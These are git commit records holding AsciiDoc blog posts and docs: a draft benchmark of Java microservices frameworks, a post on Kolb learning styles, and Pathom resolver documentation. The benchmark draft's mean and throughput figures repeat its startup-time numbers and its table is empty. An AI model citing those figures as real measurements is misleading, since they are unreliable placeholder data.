2015-12-22-Performance-of-Microservices-frameworks.adoc","repos":"cdelmas\/cdelmas.github.io,cdelmas\/cdelmas.github.io,cdelmas\/cdelmas.github.io","old_file":"_posts\/2015-12-22-Performance-of-Microservices-frameworks.adoc","new_file":"_posts\/2015-12-22-Performance-of-Microservices-frameworks.adoc","new_contents":"= Performance of Microservices frameworks\n:hp-tags: Tech, Microservices, REST, performance\n\n\nThis is the follow-up of my article about https:\/\/cdelmas.github.io\/2015\/11\/01\/A-comparison-of-Microservices-Frameworks.html[Microservices Frameworks].\n\n[options=\"header\"]\n|===\n| Framework | Package size (MB) | Startup time (ms) 4+| GET (over 5 min) 4+| POST (over 10 min)\n\n| | | | *_total_* | *_failed_* | *_mean (ms)_* | *_throughput (req\/s)_* | *_total_* | *_failed_* | *_mean (ms)_* | *_throughput (req\/s)_* \n\n| Dropwizard |15 | 1047 | | | | | | | | \n\n| Restlet |4,2 | 110 | | | | | | | | \n\n| Restlet \/ Jetty | 5,8| 110 | | | | | | | | \n\n| Restlet \/ Simple |4,5 | 110 | | | | | | | | \n\n| Sparkjava |4,1 | 290 | | | | | | | | \n\n| Spring Boot \/ Tomcat | 14 |6905 | | | | | | | | \n\n| Spring Boot \/ Jetty | 13 | 6905 | | | | | | | | \n\n| Spring Boot \/ Undertow | 14 | 6905 | | | | | | | | \n\n| vertx |5,1 | 7250 | | | | | | | | \n\n|===\n\n\n\n\nGET \/ POST\nmean\n\n- 790 ms apollo (async: 600ms)\n- 270 ms dropwizard\n- 205 ms restlet\n- ms restlet \/ Jetty\n- ms restlet \/ Simple\n- 290 ms sparkjava\n- 6905 ms spring-boot\n- 7250 ms vertx\n\nthroughput\n\n- 560 r\/s apollo\n- 1047 r\/s dropwizard\n- 110 r\/s restlet\n- 290 r\/s sparkjava\n- 6905 r\/s spring-boot\n- 7250 r\/s vertx\n\n\n\nUsing Gatling to measure the performance\n\nMethodology\n\nGet on a \/hello endpoint, with 200 users making 1000 requests each (total:\u00a0200000); a request is considered as failed if it exceeds 60s. The test is time boxed (limit: 5 minutes).\nPost on a \/hello endpoint, with 200 users making 1000 requests each (total:\u00a0200000); a request is considered as failed if it exceeds 60s. 
The test is time boxed (limit: 10 minutes).\n\nThe response is a JSON-encoded POJO.\nThe payload is JSON.\n\nResults\n\nmean, throughput, errors","old_contents":"= Performance of Microservices frameworks\n:hp-tags: Tech, Microservices, REST, performance\n\n\nThis is the follow-up of my article about https:\/\/cdelmas.github.io\/2015\/11\/01\/A-comparison-of-Microservices-Frameworks.html[Microservices Frameworks].\n\n[options=\"header\"]\n|===\n| Framework | Package size (MB) | Startup time (ms) 4+| GET (over 5 min) 4+| POST (over 10 min)\n\n| | | | *_total_* | *_failed_* | *_mean (ms)_* | *_throughput (req\/s)_* | *_total_* | *_failed_* | *_mean (ms)_* | *_throughput (req\/s)_* \n\n| Dropwizard |15 | 1047 | | | | | | | | \n\n| Restlet |4,2 | 110 | | | | | | | | \n\n| Restlet \/ Jetty | 5,8| 110 | | | | | | | | \n\n| Restlet \/ Simple |4,5 | 110 | | | | | | | | \n\n| Sparkjava |4,1 | 290 | | | | | | | | \n\n| Spring Boot \/ Tomcat | 14 |6905 | | | | | | | | \n\n| Spring Boot \/ Jetty | 13 | 6905 | | | | | | | | \n\n| Spring Boot \/ Undertow | 14 | 6905 | | | | | | | | \n\n| vertx |5,1 | 7250 | | | | | | | | \n\n|===\n\n\n\n\nGET \/ POST\nmean\n- 790 ms apollo (async: 600ms)\n- 270 ms dropwizard\n- 205 ms restlet\n- ms restlet \/ Jetty\n- ms restlet \/ Simple\n- 290 ms sparkjava\n- 6905 ms spring-boot\n- 7250 ms vertx\n\nthroughput\n- 560 r\/s apollo\n- 1047 r\/s dropwizard\n- 110 r\/s restlet\n- 290 r\/s sparkjava\n- 6905 r\/s spring-boot\n- 7250 r\/s vertx\n\n\n\nUsing Gatling to measure the performance\n\nMethodology\n\nGet on a \/hello endpoint, with 200 users making 1000 requests each (total:\u00a0200000); a request is considered as failed if it exceeds 60s. The test is time boxed (limit: 5 minutes).\nPost on a \/hello endpoint, with 200 users making 1000 requests each (total:\u00a0200000); a request is considered as failed if it exceeds 60s. The test is time boxed (limit: 10 minutes).\n\nResponse is json-encoded POJO\nPayload is json.\n\nResults\n\nmean, throughput, errors","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"e2c16cca0b860271685ffbe50835acdd53306405","subject":"Update 2016-07-12-Un-vistazo-a-los-estilos-de-aprendizaje.adoc","message":"Update 2016-07-12-Un-vistazo-a-los-estilos-de-aprendizaje.adoc","repos":"marchelo2212\/marchelo2212.github.io,marchelo2212\/marchelo2212.github.io,marchelo2212\/marchelo2212.github.io","old_file":"_posts\/2016-07-12-Un-vistazo-a-los-estilos-de-aprendizaje.adoc","new_file":"_posts\/2016-07-12-Un-vistazo-a-los-estilos-de-aprendizaje.adoc","new_contents":"= A look at learning styles\n:hp-tags: e-learning, innovation, learning styles, ICT, education\n:published_at: 2016-07-12\n\n\nAmong the many activities a teacher carries out in class, the diverse learning styles of the students must always be taken into account; this way we can ensure that each activity fosters better learning in every one of them and responds to the diversity of their characteristics.\n\n== Learning styles\n\n\n\nUsing methodologies that aim to keep the student at the center means taking into account the heterogeneity of the group and working with (planning and applying) a variety of didactic strategies that allow the whole group to achieve meaningful learning. 
For this, it is essential to propose activities targeted at their learning styles; therefore, some of these styles will be reviewed here along with their characteristics.\n\nimage:https:\/\/s20.postimg.org\/bt67sp50t\/estilos4.png[Learning styles,]\n\nOn this subject, Laura Frade articulates eight capacities that teachers must have; these capacities interact with one another to produce the optimal education of the students:\n\n1. Diagnostic capacity: the ability to detect the student's learning needs, align them with a learning style and link them to a learning strategy.\n\n2. Cognitive capacity: the ability related to acquiring the knowledge necessary to teach the subject content.\n\n3. Ethical capacity: the ability that shapes the teacher's decisions about their commitment to society, their responsibility at work, the values they will promote, the value judgments they will make, the prioritization of the students' development, and the concern for their future careers.\n\n4. Logical capacity: the ability to organize subject content in a logical, sequential way. It shows in its order, gradation and dosage.\n\n5. Empathic capacity: the ability to understand students on three different planes: affective, cognitive and psychomotor.\n\n6. Communicative capacity: the skill to mediate between learning and teaching. It shows in the use of the different types of language that enable students to appropriate knowledge and build their own meaning, which will allow them to learn for life.\n\n7. Playful capacity: the ability to design and apply diverse teaching-learning strategies.\n\n8. Metacognitive capacity: the ability to evaluate the teaching-learning process in two directions: toward the students, verifying progress and establishing corrective measures, and also toward one's own performance as a teacher, which makes it possible to improve in the profession day by day.\n\nIf we as teachers have these skills, we will ensure good work with our students.\n\n=== What are they?\n\nLearning styles are defined as the different ways in which an individual can learn; for Alonso and Gallego (1994), learning styles are the cognitive, affective and physiological traits that serve as relatively stable indicators of how students perceive, interact with and respond to their learning environments.\n\nIt is believed that every person employs a particular method of interacting with, accepting and processing stimuli and information. 
Learning-style characteristics are usually part of any psycho-pedagogical report prepared about a student, and they should be the foundation of the didactic strategies and pedagogical reinforcements so that these are the most suitable for the learner.\n\nThe various researchers who have proposed a learning style certainly differ on the components of learning styles; however, these are some of the most commonly used:\n\n* Environmental conditions\n* Cultural background\n* Age\n* Grouping preferences (that is, whether one works better individually or in a team)\n* The style followed for problem solving\n* Type of motivation, internal or external locus of control\n\nAnalyzing the different learning styles of our students will undoubtedly allow us to make decisions aimed at meeting each singular need within the group, and with that, the group of students as a whole can achieve the planned assimilation of knowledge, or perhaps an even better one.\n\n\n=== Classification\n\nThe existing models of learning styles offer a conceptual framework for understanding the behaviors observed in the classroom; they explain how those behaviors relate to the way students are learning and to the type of teaching strategies that may prove most effective at a given moment, whether because of the subject content itself or because of the various social interactions that take place in the classroom.\n\n\nWe thus have several classifications, which are shown in the following table:\n\n\nimage:https:\/\/s20.postimg.org\/6t8rkqze5\/estilos1.png[Classification of learning styles, 800,400 role=right]\n\n=== Kolb's model\n\nExperiential learning progresses through a cycle of activities commonly known as Kolb's learning cycle (David Kolb, 1984). \n\nThe cycle has four components, each of which poses specific challenges when planning academic activities.\n\nimage:http:\/\/image.slidesharecdn.com\/estilos-de-aprendizaje-k-o-l-b2165\/95\/estilos-de-aprendizaje-k-o-l-b-5-728.jpg[Kolb model cycle]\n\nAccording to this model, a person usually settles their learning style in one, or at most two, of these phases, and in this way we can classify our students according to the phase they prefer to work in.\n\n* Active\n* Reflective\n* Theoretical\n* Pragmatic\n\n\n\n=== Characteristics of each style\n\nIn order to propose and employ learning strategies appropriate to each style, let us review the characteristics of each one:\n\n\n[cols=\"1,2,1,1\", options=\"header,footer,autowidth\"]\n.Characteristics of the learning styles in Kolb's model\n|===\n|Style |General characteristics |When learning is facilitated |When learning is NOT facilitated\n|Active\n\n|They get fully involved, without prejudice, in new experiences.\nThey enjoy the moment and every event. Enthusiastic about anything new. They act first and think about the consequences later. They enjoy working in teams, being the hub of the group. Long-term planning and consolidating projects bore them. \n*The question they seek to answer through learning is: _How?_*\n\n|Posing challenging activities. Activities with immediate or short-term results. 
Active activities involving emotion, drama, action.\n\n|Being passive. Analyzing a topic too much, or too much reflection on something. Individual work.\n\n|Reflective\n\n\n|They adopt an observer's stance, analyzing data and experiences from several perspectives. They draw conclusions based on solid, convincing arguments. They are cautious and analyze all the implications of any action before setting themselves in motion. In meetings they observe and listen before speaking, trying to go unnoticed. *The question they want to answer through learning is: _Why?_*\n\n|When they can take the position of an observer. Analyzing situations. Being given information or data. Having time to reflect before acting.\n\n|Being required to be the center or focus of attention. Activities demanding an immediate solution. Improvising on something. Activities that rush them. \n\n|Theoretical\n\n|They adapt and integrate theories or foundations in a logical way. They organize things in a sequential, integrated and coherent manner. They analyze and synthesize information rationally. They are neither subjective nor illogical. *The question they want to answer is: _What?_*\n\n|When starting from theories, models, systems. Challenging ideas or concepts. Activities that encourage inquiry or questioning.\n\n|Ambiguous activities or ones that generate uncertainty. Activities or situations that prioritize feelings or emotions. When the theory or conceptual foundations are not provided.\n\n|Pragmatic\n\n\n|They like putting new ideas, theories and techniques into practice and verifying how they work and how to use or apply them. They generate or seek ideas and execute them immediately. They rely on reality to propose alternatives in order to make decisions about something. They look for challenges and for rethinking something from a different perspective. They discuss a topic briefly; long debates bore them. 
https:\/\/goo.gl\/BGAm5A\n\n\n","old_contents":"= Un vistazo a los estilos de aprendizaje\n:hp-tags: e-learning, innovaci\u00f3n, estilos de aprendizaje,TIC, educaci\u00f3n\n:published_at: 2016-07-12\n\n\nDentro de las diversas acciones que un docente desarrolla en clase siempre debe tomar en cuenta los divesos estilos de aprendizaje de sus estudiantes, de esta manera podemos asegurar que cada actividad podr\u00e1 generar un mejor aprendizaje en cada uno de ellos y responder a la diversidad de caracter\u00edsiticas de los mismo.\n\n== Estilos de aprendizaje\n\n\n\nEl emplear metodolog\u00edas que apunten a mantener como eje central al estudiante deber\u00e1n tomar en cuenta la heterogeneidad del grupo y trabajar (planificando y aplicado) diversas estrategias did\u00e1ctiva que permitan justamente que todo el grupo genere un aprendizaje significativo. Para esto imprescindible el proponer actividades direccionadas a sus estilos de aprendizaje, por ello, se revisar\u00e1 algunas de ellas con sus caracter\u00edsticas.\n\nimage:https:\/\/s20.postimg.org\/bt67sp50t\/estilos4.png[Estilos de aprendizaje,]\n\nRefiri\u00e9ndose al tema Laura Frade, articula ocho capacidades que deben tener los docentes, estas capacidades interact\u00faan entre s\u00ed para dar como resultado la \u00f3ptima formaci\u00f3n de los estudiantes:\n\n1. Capacidad diagn\u00f3stica: capacidad de detectar las necesidades de aprendizaje del estudiante, alienearla a un estilo de aprendizaje y vincularla con una estrategia de aprendizaje.\n\n2. Capacidad cognitiva: capacidad que guarda relaci\u00f3n con la adquisici\u00f3n del conocimiento necesario para impartir los contenidos tem\u00e1ticos.\n\n3. Capacidad \u00e9tica: capacidad que incide en la toma de decisiones del docente sobre su compromiso ante la sociedad, la responsabilidad de trabajo, los valores que promover\u00e1, los juicios de valor que emitir\u00e1, la priorizaci\u00f3n del desarrollo de los estudiantes, la preocupaci\u00f3n sobre su futuro laboral.\n\n4. Capacidad l\u00f3gica: capacidad para organizar el contenido tem\u00e1ticos de forma l\u00f3gica-secuencial. Se demuestra por su, orden, graduaci\u00f3n y dosificaci\u00f3n.\n\n5. Capacidad emp\u00e1tica: capacidad que permite entender a los estudiantes en tres diferentes planos: afectivo, cognitivo y psicomotriz.\n\n6. Capacidad comunicativa: habilidad para lograr la mediaci\u00f3n entre el aprendizaje y la ense\u00f1anza.Se evidencia en el uso de los diferentes tipos de lenguaje que posibiliten al estudiante apropiarse del conocimiento y hacer su propia construcci\u00f3n significativa, lo que les permitir\u00e1 aprender para la vida.\n\n7. Capacidad l\u00fadica: capacidad que permite dise\u00f1ar y aplicar diversas estrategias de ense\u00f1anza-aprendizaje.\n\n8. 
Capacidad metacognitiva: capacidad para evaluar el proceso ense\u00f1anza-aprendizaje en dos v\u00edas: hacia los alumnos verificando avances y estableciendo medidas correctivas, pero adem\u00e1s hacia su propio desempe\u00f1o como docente, lo que le permitir\u00e1 mejorar d\u00eda a d\u00eda en su profesi\u00f3n.\n\nSi nosotros como docentes contamos con estas habilidades, aseguraremos un buen trabajo con nuestros estudiantes.\n\n=== \u00bfQu\u00e9 son?\n\nSe definen como las distintas maneras en que un individuo puede aprender; para Alonso y Gallego (1994) los estilos de aprendizaje son los rasgos cognitivos, afectivos y fisiol\u00f3gicos que sirven como indicadores relativamente estables de c\u00f3mo los alumnos perciben interacciones y responden a sus ambientes de aprendizaje.\n\nSe cree que todas las personas emplean un m\u00e9todo particular de interacci\u00f3n, aceptaci\u00f3n y procesado de est\u00edmulos e informaci\u00f3n. Las caracter\u00edsticas sobre estilo de aprendizaje suelen formar parte de cualquier informe psicopedag\u00f3gico que se elabore sobre un estudiante, y debiera ser el fundamento de las estrategias did\u00e1cticas y refuerzos pedag\u00f3gicos para que estos sean los m\u00e1s adecuados para el alumno.\n\nLos diversos investigadores que han propuesto alg\u00fan estilo de aprendizaje en cierto difieren de los componentes de los estilos de aprendizaje; sin embargo estos ser\u00edan algunos de los m\u00e1s empleados:\n\n* Condiciones ambientales\n* Bagaje cultural\n* Edad\n* Preferencias de agrupamiento (se refiere a si se trabaja mejor individual-\nmente o en equipo)\n* Estilo seguido para la resoluci\u00f3n de problemas\n* Tipo de motivaci\u00f3n, locus de control interno o externo\n\nEl analizar los diferentes estilos de aprendizjae que tienen nuestros estudiantes sin lugar a dudas permitir\u00e1 que podamos tomar decisiones dirigidas a satisfacer cada necesidad singular en el grupo y con ellos que el conjunto de estudiantes logre la asimilizaci\u00f3n de conocimientos planificiada o quiz\u00e1s una superior.\n\n\n=== Clasificaci\u00f3n\n\nLos modelos existentes sobre estilos de aprendizaje ofrecen un marco conceptual para entender los comportamientos observados en el aula, los cuales brindan una\nexplicaci\u00f3n sobre la relaci\u00f3n de esos comportamientos con la forma en que est\u00e1n aprendiendo los alumnos y el tipo de estrategias de ense\u00f1anza que pueden resultar m\u00e1s eficaces en un momento determinado, ya sea por el contendido tem\u00e1tico en s\u00ed, o bien por las diversas interacciones sociales que se desarrollan en el aula.\n\n\nDe esta manera tenemos varias clasificaciones las cuales se muestran en la siguiente tabla:\n\n\nimage:https:\/\/s20.postimg.org\/6t8rkqze5\/estilos1.png[Calsificaci\u00f3n estilos de apredizaje, 800,400 role=right]\n\n=== Modelo de Kolb\n\nEl aprendizaje experiencial progresa a trav\u00e9s de un ciclo de actividades a las que se conoce habitualmente como ciclo de aprendizaje de Kolb (David Kolb, 1984). 
\n\nEl ciclo tiene cuatro componentes, cada uno de los cuales plantea retos concretos a la hora de planificar actividades acad\u00e9micas.\n\nimage:http:\/\/image.slidesharecdn.com\/estilos-de-aprendizaje-k-o-l-b2165\/95\/estilos-de-aprendizaje-k-o-l-b-5-728.jpg [ciclos modelo kolb]\n\nAcorde este modelo una persona sulee establecer su estilo de aprendizaje en 1 o m\u00e1ximo 2 de estas fases y de esta menera podemos clasificar a nuestros estudiantes acorde la fase que prefieran trabajar.\n\n* Activo\n* Reflexivo\n* Te\u00f3rico\n* Pragm\u00e1tico\n\n\n\n=== Car\u00e1ter\u00edsticas de cada estilo \n\nPara lograr proponer\/emplear estrategias de aprendizaje apropiadas para cada estilo revisemos las caracter\u00edsticas de cada uno:\n\n\n[cols=\"1,2,1,1\", options=\"header,footer,autowidth\"]\n.Caracter\u00edsticas Estilos de parendizaje modelo Kolb\n|===\nEstilo |Caracter\u00edstica General |Cuando facilita el aprendizaje |Cuando NO facilita el aprendizaje.\n|Activos\n\n|Se involucran totalmente y sin prejuicios en las experiencias nuevas.\nDisfrutan el momento y cada acontecimiiento. Entusiastas ente lo nuevo. Actuan primero y luego piensan en las consecuencias. Disfrutan trabajando en equipo siendo el eje del grupo. Les aburre planificar a largo plazo y consolidar poryectos. \n*La pregunta que buscan responder en el aprendizaje es: _\u00bfC\u00f3mo?_*\n\n|Plantendo actividades desafiantes . Actividades de resultados immediatos o a corto plazo. Actividades activas de emoci\u00f3n, drama, acci\u00f3n.\n\n|Siendo pasivos. Demasiado an\u00e1lisis de un tema o mucha reflexi\u00f3n sobre algo. Trabajo individual.\n\n|Reflexivo\n\n\n|Adoptan una postura observadora de an\u00e1lsis en base a datos, experiencias desde varias perpectivas.Establecen conclusiones en base a argumentos s\u00f3lidos y convincentes. Son precavidos y analizan todas las implicaciones de cualquier acci\u00f3n antes de ponerse en\nmovimiento. En las reuniones observan y escuchan antes de hablar procurando pasar desapercibidos. *La pregunta que quieren responder con el aprendizaje es: _\u00bfPor qu\u00e9?_*\n\n|Cuando pueden tener una postura de observador. Analizar situaciones. Se les facilita informaci\u00f3n o datos. Tienen tiempo para reflexionar antes de actuar.\n\n|Se exigen ser centro o eje de atenci\u00f3n. Actividades de soluci\u00f3n inmediata. Improvisaci\u00f3n sobre algo. Actividades que le apresuren. \n\n|Te\u00f3ricos\n\n|Adaptan e intergran las teor\u00edas o fundamentos de forma l\u00f3gica. Organizan las cosas de forma secuencial, integrada y coherente. Analizan y sintetizan informaci\u00f3n de forma racional. No son subjetivos ni il\u00f3gicos. *La pregutna que quieren responder es: _\u00bfQu\u00e9?_*\n\n|Cuando se parte de teor\u00edas, modelos, sistemas. Ideas o conceptos desafiantes. Actividades que propicien la indagaci\u00f3n o cuestionamientos.\n\n|Actividades abiguas o que generen incertidumbre. Actividades\/situaciones que prioricen sentimientos o emociones. Cuando no se les facilita la teor\u00eda o bases conceptuales.\n\n|Pr\u00e1gm\u00e1ticos\n\n\n|Gustan de poner en pr\u00e1ctica las ideas, teor\u00edas, t\u00e9cnicas nuevas y verificar su funcionamiento, forma de uso\/aplicaci\u00f3n. Generan\/buscan ideas y las ejecutan inmediatamente. Se basan en la realidad para plantear alternativas a fin de de tomar decisiones sobre algo. Buscan desaf\u00edos, replantear algo con una diferente perspectiva. Discuten un tema brevemenete, les aburren los debates largos. 
*La pregunta que quieren responder es: _\u00bfQu\u00e9 pasar\u00eda si?_*\n\n\n|Actividades que enlacen la teor\u00eda con la pr\u00e1ctica. Visualizan trabajo\/movimiento\/acci\u00f3n. Posibilidad de aplicaci\u00f3n de algo aprendido.\n\n\n|Cuando todo queda en teor\u00eda. Lo aprendido no se vincula con la realidad o necesidades puntuales. Actividades que no se identifique una finalidad con claridad.\n\n|===\n\n\n\nNOTE: Bibliograf\u00eda\n\nDra. Lourdes Galeana (2007). Aprendizaje Basado en proyectos. Universidad de Colima. http:\/\/goo.gl\/wzvMrG\n\nMaria Victoria Gonz\u00e1lez Clavero (2011). Estilos de aprendizaje y su influencia para aprender a aprender. Universidad Central \u201cMarta Abreu\u201d de Las Villas. Santa - Cuba. mariag@uclv.edu.cu http:\/\/goo.gl\/fuDZPb\n\nSecretar\u00eda de Educaci\u00f3n P\u00fablica - M\u00e9xico (2005). Manual de estilos de aprendizaje, Material autoinstitucional para docentes y orientadores educativos. http:\/\/goo.gl\/ZAeldY\n\nJohn Stephenson, Albert Sangr\u00e0 (2009). Fundamentos del dise\u00f1o t\u00e9cnico-pedag\u00f3gico en e-learning. https:\/\/goo.gl\/BGAm5A\n\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"99794e6329fff28a4db3dac43a84d3bcea3d296e","subject":"Add docs for new resolver builders","message":"Add docs for new resolver builders\n","repos":"wilkerlucio\/pathom,wilkerlucio\/pathom,wilkerlucio\/pathom,wilkerlucio\/pathom","old_file":"docs-src\/modules\/ROOT\/pages\/connect\/resolvers.adoc","new_file":"docs-src\/modules\/ROOT\/pages\/connect\/resolvers.adoc","new_contents":"= Resolvers\n\nIn `Connect`, you implement the graph by creating `resolvers`. Those resolvers are functions that expose some data on the graph.\n\nA resolver has a few basic elements:\n\n. Inputs \u2013 A set of attributes that are required to be in the current parsing context\nfor the resolver to be able to work. Inputs is optional, no inputs means that the\nresolver is always capable of working, independently of the current parsing context.\n. Outputs - A query-like notation representing the shape of data the resolver is able\nto resolve. This is typically a list of attributes\/joins, where joins\ntypically include a simple subquery.\n. A function - A `(fn [env input-data] tree-of-promised-output)` that takes the inputs\nand turns them into a tree that satisfies the \"output query\".\n\nSo you might define a resolver like this:\n\n[source,clojure]\n----\n(pc\/defresolver person-resolver\n [{:keys [database] :as env} {:keys [person\/id]}]\n {::pc\/input #{:person\/id}\n ::pc\/output [:person\/first-name :person\/age]}\n (let [person (my-database\/get-person database id)]\n {:person\/age (:age person)\n :person\/first-name (:first-name person)}))\n----\n\nTIP: If you use link:https:\/\/cursive-ide.com\/[Cursive], you can ask it to resolve the `pc\/defresolver` as a `defn` and you will get proper symbol resolution\n\nWhere the `database` in the environment would be supplied when running the parser, and the input would have to be\nfound in the current context. Remember that graph queries are contextual... you have to have a starting node to work\nfrom, so in the above example we're assuming that during our parse we'll reach a point where the context contains\na `:person\/id`. 
The `my-database` stuff is just made up for this example, and is intended to show you that your\ndata source does not need to remotely match the schema of your graph query.\n\nPathom will scan through the defined resolvers in order to try to satisfy all of the properties in a query. So, technically\nyou can split up your queries as much as makes sense into separate resolvers, and as long as the inputs are in the context\nPathom will assemble things back together.\n\nOf course, it doesn't make sense in this case to do so, because each resolver would end up running a new query:\n\n[source,clojure]\n----\n(pc\/defresolver person-age-resolver [{:keys [database] :as env} {:keys [person\/id]}]\n {::pc\/input #{:person\/id}\n ::pc\/output [:person\/age]}\n (let [person (my-database\/get-person database id)]\n {:person\/age (:age person)}))\n\n(pc\/defresolver person-first-name-resolver [{:keys [database] :as env} {:keys [person\/id]}]\n {::pc\/input #{:person\/id}\n ::pc\/output [:person\/first-name]}\n (let [person (my-database\/get-person database id)]\n {:person\/first-name (:first-name person)}))\n\n...\n----\n\nThe point is that a single-level query like `[:person\/id :person\/first-name :person\/age]` can be satisfied and \"folded together\"\nby Pathom over any number of resolvers.\n\nThis fact is the basis of parser (de)composition and extensibility. It can also come in handy for performance\nrefinements when there are computed attributes.\n\n== Derived\/Computed Attributes\n\nThere are times when you'd like to provide an attribute that is computed in some fashion. You can, of course, simply\ncompute it within the resolver along with other properties like so:\n\n[source,clojure]\n----\n(pc\/defresolver person-resolver [{:keys [database] :as env} {:keys [person\/id]}]\n {::pc\/input #{:person\/id}\n ::pc\/output [:person\/first-name :person\/last-name :person\/full-name :person\/age]}\n (let [{:keys [age first-name last-name]} (my-database\/get-person database id)]\n {:person\/age age\n :person\/first-name first-name\n :person\/last-name last-name\n :person\/full-name (str first-name \" \" last-name) ; COMPUTED\n ...}))\n----\n\nbut this means that you'll take the overhead of the computation when *any* query related to a person comes up. You can\ninstead spread such attributes out into other resolvers as we discussed previously, which will only be invoked if the\nquery actually asks for those properties:\n\n[source,clojure]\n----\n(pc\/defresolver person-resolver [{:keys [database] :as env} {:keys [person\/id]}]\n {::pc\/input #{:person\/id}\n ::pc\/output [:person\/first-name :person\/last-name :person\/age]}\n (let [{:keys [age first-name last-name]} (my-database\/get-person database id)]\n {:person\/age age\n :person\/first-name first-name\n :person\/last-name last-name}))\n\n(pc\/defresolver person-name-resolver [_ {:person\/keys [first-name last-name]}]\n {::pc\/input #{:person\/first-name :person\/last-name}\n ::pc\/output [:person\/full-name]}\n {:person\/full-name (str first-name \" \" last-name)})\n----\n\nThis combination of resolvers can still resolve all of the properties in `[:person\/full-name :person\/age]` (if\n`:person\/id` is in the context), but a query for just `[:person\/age]` won't invoke any of the logic for the\n`person-name-resolver`.\n\n== Single Inputs -- Establishing Context [[SingleInputs]]\n\nSo far we have seen how to define a resolver that can work *as long as* the inputs are already in the environment. 
You're\nalmost certainly wondering how to do that.\n\nOne way is to define <<GlobalResolvers,global resolvers>> and start the query from them, but very often you'd just\nlike to be able to say \"I'd like the first name of person with id 42.\"\n\nEQL uses \"idents\" to specify exactly that sort of query:\n\n[source,clojure]\n----\n[{[:person\/id 42] [:person\/first-name]}]\n----\n\nThe above is a join on an ident, and the expected result is a map with the ident as a key:\n\n[source,clojure]\n----\n{[:person\/id 42] {:person\/first-name \"Joe\"}}\n----\n\nThe query *itself* has everything you need to establish the *context* for running the `person-resolver`,\nand in fact that is how Pathom single-input resolvers work.\n\nIf you use an ident in a query then Pathom is smart enough to know that it can use that ident to establish the context\nfor finding resolvers. In other words, in the query above the ident `[:person\/id 42]` is turned\ninto the *parsing context* `{:person\/id 42}`, which satisfies the *input* of any resolver that needs\n`:person\/id` to run.\n\n== Resolver Without Input -- Global Resolver [[GlobalResolvers]]\n\nA resolver that requires no input can output its results at any point in the graph, thus it is really a global resolver.\nPay particular attention to the *\"at any point in the graph\"* - it's not just at the root. Thus, a resolver without inputs\ncan \"inject\" its outputs into any level of the query graph result.\n\nWe're going to start building a parser that can satisfy queries about a music store. So, we'll start with a global resolver\nthat can resolve the \"latest product\". The code below shows the entire code needed, boilerplate and all:\n\n[source,clojure]\n----\ninclude::example$com\/wsscode\/pathom\/book\/connect\/getting_started.cljs[]\n----\n\n
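Since that code lives in an included file, here is roughly the shape of such a global resolver (a sketch only; the `:product\/price` attribute and the concrete values are illustrative, not taken from the demo file):\n\n[source,clojure]\n----\n(pc\/defresolver latest-product [_ _]\n {::pc\/output [{::latest-product [:product\/id :product\/title :product\/price]}]}\n ; no input: this value can be resolved anywhere in the graph\n {::latest-product {:product\/id 1\n :product\/title \"Acoustic Guitar\"\n :product\/price 199.99}})\n----\n\n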
Our first resolver exposes the attribute `::latest-product`, and since it doesn't require any input it is a global resolver.\nAlso, note that our output description includes the full output details (including nested attributes); this is mostly\nuseful for auto-completion on UIs and automatic testing. If you return extra data it will still end up in the output\ncontext.\n\nTry some of these queries on the demo below:\n\n[source,clojure]\n----\n[::latest-product]\n[{::latest-product [:product\/title]}]\n\n; ::latest-product can be requested anywhere\n[{::latest-product\n [* ::latest-product]}]\n----\n\n++++\n<div x-app=\"interactive-parser\" data-parser=\"connect.getting-started\" class=\"loader\">\n[::latest-product]\n<\/div>\n<div class=\"space\"><\/div>\n++++\n\n== Resolvers with single input\n\nNext, let's say we want to have a new attribute which is the brand of the product. Of course, we could just throw the\ndata there in our other resolver, but the real power of Connect comes out when we start splitting the responsibilities\namong resolvers, so let's define a resolver for brand that requires an input of `:product\/id`:\n\n[source,clojure]\n----\ninclude::example$com\/wsscode\/pathom\/book\/connect\/getting_started2.cljs[]\n----\n\n++++\n<div x-app=\"interactive-parser\" data-parser=\"connect.getting-started2\" class=\"loader\">\n[{::latest-product [:product\/title :product\/brand]}]\n<\/div>\n<div class=\"space\"><\/div>\n++++\n\nThe input is a `set` containing the keys required on the current entity in the parsing context for the resolver to be\nable to work. This is where `Connect` starts to shine because any time your query asks for a bit of data\nit will try to figure out how to satisfy that request based on the attributes that the current contextual entity *already has*.\n\nMore importantly: `Connect` will *explore the dependency graph* in order to resolve things if it needs to!\nTo illustrate this, let's pretend we have some external ID for the brand and that we can derive this ID from the\nbrand string - pretty much just another mapping:\n\n[source,clojure]\n----\n;; a silly pretend lookup\n(def brand->id {\"Taylor\" 44151})\n\n(pc\/defresolver brand-id-from-name [_ {:keys [product\/brand]}]\n {::pc\/input #{:product\/brand}\n ::pc\/output [:product\/brand-id]}\n {:product\/brand-id (get brand->id brand)})\n\n(comment\n (parser {} [{::latest-product [:product\/title :product\/brand-id]}])\n ; => #::{:latest-product #:product{:title \"Acoustic Guitar\", :brand-id 44151}}\n)\n----\n\nNote that our query never said anything about the `:product\/brand`. `Connect` automatically walked the path\n`:product\/id -> :product\/brand -> :product\/brand-id` to obtain the information desired by the query!\n\nWhen a required attribute is not present in the current entity, `Connect` will calculate the possible paths\nfrom the data you have to the data you request, analyzing resolver inputs and recursively walking backwards\ntowards the \"known data\" in the context. It can then use some heuristic to decide which path to take and walk\nthat path to reach the data; if there is no possible path, the connect reader will return `::p\/continue` to\nlet another reader try to handle that key. You can read more about how this works in the Index page.\n\nAlso remember that single-input resolvers can handle ident-based queries.\nThus, the following ident-join queries already work without having to define anything else:\n\n[source,clojure]\n----\n(parser {} [{[:product\/id 1] [:product\/brand]}])\n; => {[:product\/id 1] #:product{:brand \"Taylor\"}}\n\n(parser {} [{[:product\/brand \"Taylor\"] [:product\/brand-id]}])\n; => {[:product\/brand \"Taylor\"] #:product{:brand-id 44151}}\n----\n\n== Multiple inputs\n\nThe input to a resolver is a set, and as such you can require more than one thing as input to your resolvers. When doing\nso, of course, your resolver function will receive all of the inputs requested; however, this also means that the parsing\ncontext needs to contain them, or there must exist other resolvers that can use what's in the context to fill them in.\n\n
